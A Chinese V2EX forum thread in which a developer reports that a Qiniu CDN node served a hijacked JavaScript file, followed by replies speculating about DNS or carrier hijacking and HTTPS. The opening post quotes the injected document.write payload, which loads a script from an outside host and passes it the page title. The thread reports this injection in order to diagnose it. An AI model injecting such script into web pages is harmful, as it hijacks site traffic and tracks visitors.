V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
tomwan
V2EX  ›  云计算

七牛某个节点被劫持了

  •  
  •   tomwan · 2015-08-13 11:14:42 +08:00 · 6129 次点击
    这是一个创建于 3424 天前的主题,其中的信息可能已经有所发展或是发生改变。

    昨天发现公司网站偶尔会无法访问,发现个别时候某个访问https://dn-shimo-assets.qbox.me/assets/scripts/home-a2e8c81c8f.js当解析到218.75.154.115这个ip地址的时候返回的结果不是正常的压缩过的js内容,而是

    document.write("<script language='javascript' src='http://dn-shimo-assets.qbox.me/assets/scripts/home-a2e8c81c8f.js?_vv=20080808'></script>");document.write("<script language='javascript' src='http://p.ywbmh.com:7777/pt/pt.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=2875964025'></script>");
    

    目测这货是试图用 _vv 参数来让浏览器访问其他节点读取这个js好让用户可以正常访问,但是不巧公司网站是https的,https里加载httpjs资源是会页面报错的,然后就被我发现了。
    v友有谁遇到过这玩意吗?在七牛上提交了工单,但是一天了,木人鸟我,电话也打了,说是会回复工单,然而并没有。

    Alt text
    Alt text

    20 条回复    2015-08-26 16:25:18 +08:00
    virusdefender
        1
    virusdefender  
       2015-08-13 11:55:32 +08:00
    https 的也会劫持么?
    ccbikai
        2
    ccbikai  
       2015-08-13 12:02:59 +08:00
    @virusdefender DNS 劫持
    bilok
        3
    bilok  
       2015-08-13 13:06:43 +08:00
    dns劫持证书会报错吧
    乱签证书会被全球吊销根证书吧
    应该是某台服务器上缓存出问题被劫持了
    Agromania
        4
    Agromania  
       2015-08-13 13:11:49 +08:00
    gamexg
        5
    gamexg  
       2015-08-13 13:15:42 +08:00 via Android
    同样的疑问https没报证书错误?
    七牛的证书私钥泄露了?
    gamexg
        6
    gamexg  
       2015-08-13 13:17:02 +08:00 via Android
    gamexg
        7
    gamexg  
       2015-08-13 13:33:38 +08:00
    这个应该是正确的 http 响应:

    Accept-Ranges:bytes
    Access-Control-Allow-Origin:*
    Access-Control-Max-Age:2592000
    Cache-Control:public, max-age=31536000
    Connection:keep-alive
    Content-Disposition:inline; filename="home-a2e8c81c8f.js"
    Content-Encoding:gzip
    Content-Transfer-Encoding:binary
    Content-Type:application/javascript
    Date:Thu, 13 Aug 2015 05:25:49 GMT
    ETag:"Fr4cMb1JgqsOHYneDzsn7Kkt3dFi.gz"
    Last-Modified:Tue, 11 Aug 2015 07:11:13 GMT
    Server:nginx/1.4.4
    Transfer-Encoding:chunked
    X-Log:mc.g;IO:2
    X-Qiniu-Zone:0
    X-Reqid:QQgAAMyZzA093fkT
    X-Via:1.1 nn121:8080 (Cdn Cache Server V2.0), 1.1 jiax13:2 (Cdn Cache Server V2.0)


    和楼主的截图出错时的http头不相同,印象中七牛为了防止出现跨域问题都带 Access-Control-Allow-Origin:* 头的。
    dianso
        8
    dianso  
       2015-08-13 13:43:05 +08:00
    等吧,总有轮到你工单的时候。
    lsylsy2
        9
    lsylsy2  
       2015-08-13 13:44:40 +08:00
    HTTPS的话,七牛到你的电脑应该是不会被修改的……
    我们可以得出结论 七牛在边缘节点到源节点的路径是明文传输的?
    zhuang
        10
    zhuang  
       2015-08-13 13:49:25 +08:00   ❤️ 1
    我猜当前 cdn 服务器的缓存失效了,通过增加 _vv 参数指向不存在的内容实现重定向回源。

    我不清楚七牛是如何做 ssl cdn 的,应该没有证书托管或者直接使用七牛的证书吧?具体实现就是全站 https,但是来源有你自己的服务器,也有来自七牛的服务器,各自使用各自的证书。

    这种使用模式是有安全隐患的,具体可以参考我在另一个帖子 #12 的回复。

    https://v2ex.com/t/201769#reply12
    hgc81538
        11
    hgc81538  
       2015-08-13 13:51:56 +08:00
    我想了一個可能性:
    1) 用戶訪問七牛
    2) 七牛沒有記錄, 回源取文件
    3) 运营商劫持七牛與源的通訊
    4) 七牛取得被劫持的文件
    5) 七牛缓存文件並響應用戶被劫持的文件
    rwifeng
        12
    rwifeng  
       2015-08-13 13:52:16 +08:00
    @tomwan 工单应该在你的注册邮箱里, 可以查找下
    tomwan
        14
    tomwan  
    OP
       2015-08-13 14:49:35 +08:00
    @Esec 一毛一样啊。。。看来可能不是七牛的锅
    tomwan
        15
    tomwan  
    OP
       2015-08-13 14:59:13 +08:00
    @rwifeng sunquan#shimo.im,运维哥哥说没有收到呀
    tomwan
        16
    tomwan  
    OP
       2015-08-13 15:02:03 +08:00
    @rwifeng 不过昨天晚上快一点的时候回复了,忘记看了,不好意思
    tomwan
        17
    tomwan  
    OP
       2015-08-13 15:03:13 +08:00
    @hgc81538 七牛能取到被劫持的文件吗?估计七牛是受害者。。
    tomwan
        18
    tomwan  
    OP
       2015-08-13 15:07:58 +08:00
    @zhuang 证书托管比较贵,没有做,用的是七牛的证书。看了你的`post`,很不错
    realpg
        19
    realpg  
       2015-08-13 16:08:04 +08:00
    你这是运营商干的
    跟七牛没关系

    找运营商去
    zsmjcnm
        20
    zsmjcnm  
       2015-08-26 16:25:18 +08:00
    啃爹
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   959 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 22:34 · PVG 06:34 · LAX 14:34 · JFK 17:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.